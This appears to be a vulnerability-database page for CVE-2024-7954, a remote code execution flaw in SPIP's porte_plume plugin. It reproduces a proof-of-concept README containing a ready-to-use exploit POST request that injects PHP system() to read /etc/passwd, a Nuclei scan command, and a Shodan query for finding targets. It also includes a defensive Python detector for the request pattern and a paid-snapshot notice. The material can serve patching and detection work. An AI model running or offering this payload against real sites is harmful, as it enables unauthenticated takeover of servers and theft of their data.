Related vulnerability
Title:
SPIP security vulnerability
(CVE-2024-7954)
Description: SPIP is free, open-source software from the SPIP project for building Internet sites. SPIP contains a security vulnerability: it is affected by an arbitrary code execution flaw through which a remote, unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.
Introduction
# RCE-CVE-2024-7954
## Description
The **porte_plume** plugin, utilized by SPIP versions prior to **4.30-alpha2**, **4.2.13**, and **4.1.16**, is susceptible to a critical **arbitrary code execution (RCE)** vulnerability. This flaw allows a remote, unauthenticated attacker to execute arbitrary PHP code as the SPIP user by crafting a specific HTTP request. The potential for exploitation is severe, enabling attackers to run malicious commands on the server, which could lead to unauthorized access, data breaches, or further system compromise.
### Vulnerability Details
- **Affected Software:** SPIP (prior to versions 4.30-alpha2, 4.2.13, and 4.1.16)
- **Type of Vulnerability:** Remote Code Execution (RCE)
- **Severity Level:** Critical
- **Exploitability:** Remote and unauthenticated attackers can exploit this vulnerability.
## Exploit
### Nuclei Scan
```
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
```
An example of a crafted HTTP request that can be used to exploit this vulnerability is as follows (`{{Hostname}}` stands for the target host or IP):
```
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
```
### Explanation of the Exploit:
- The `POST` request is directed to the **porte_plume_previsu** action of SPIP's index.php file.
- The **data** parameter contains a payload that leverages PHP's `system()` function to execute a command (in this case, `cat /etc/passwd`), which reads the contents of the password file.
- By changing the command within the `system()` function, an attacker could execute any PHP code on the server, leading to severe consequences.
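A defender-side check for this request pattern, as an added example that is not part of the original README: it parses a raw HTTP request and flags a POST to the porte_plume_previsu action whose `data` field contains a PHP open tag, which is the shape of the exploit above. The function names, the sample requests and the `spip.example.test` host are constructed for this example.

```python
"""Added example: detect CVE-2024-7954 exploitation attempts in raw HTTP requests.
Flags POSTs to SPIP's porte_plume_previsu action whose `data` field carries a
PHP open tag. The sample requests at the bottom are constructed."""
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Add "<?" only when the target runs with short_open_tag=On; it also matches "<?xml".
PHP_OPEN_TAGS = ("<?php", "<?=")

def parse_http_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body

def check_request(raw: str):
    """Return a short finding for a CVE-2024-7954 attempt, or None if benign."""
    method, target, headers, body = parse_http_request(raw)
    query = parse_qs(urlsplit(target).query)
    form = {}
    if "x-www-form-urlencoded" in headers.get("content-type", ""):
        form = parse_qs(body)
    # The action may arrive in the query string or in the form body.
    action = (query.get("action") or form.get("action") or [""])[0]
    if method != "POST" or action != "porte_plume_previsu":
        return None
    for data in form.get("data", []):
        # parse_qs decoded once; decode again to catch double-encoded payloads.
        decoded = unquote_plus(data).lower()
        if any(tag in decoded for tag in PHP_OPEN_TAGS):
            return f"PHP open tag in porte_plume_previsu data: {decoded[:60]!r}"
    return None

# Constructed samples: a harmless marker payload, and a legitimate preview of SPIP link markup.
MALICIOUS = ("POST /index.php?action=porte_plume_previsu HTTP/1.1\r\n"
             "Host: spip.example.test\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
             "data=AA_%5B-%3EURL%3C%3Fphp+echo+1%3B+%3F%3E%5D_BB")
BENIGN = ("POST /index.php?action=porte_plume_previsu HTTP/1.1\r\n"
          "Host: spip.example.test\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
          "data=%5BSPIP-%3Ehttps%3A%2F%2Fwww.spip.net%5D+preview+text")

if __name__ == "__main__":
    for name, req in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(name, "->", check_request(req))
```

The same check can be run over the `data` field recovered from a WAF or reverse-proxy log of POST bodies; ordinary previews that only use SPIP link markup such as `[text->url]` are not flagged.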
## Shodan Dork
To identify potentially vulnerable SPIP installations, the following Shodan search query can be used:
```
app="SPIP"
```
This vulnerability underscores the importance of keeping software up to date and implementing robust security measures to protect against exploitation.
File snapshot
[4.0K] /data/pocs/c3334eff89c8c07ff85477d4211705e13ccdb214
└── [2.0K] README.md
0 directories, 1 file
Notes
1. Accessing the PoC through its original source is recommended.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.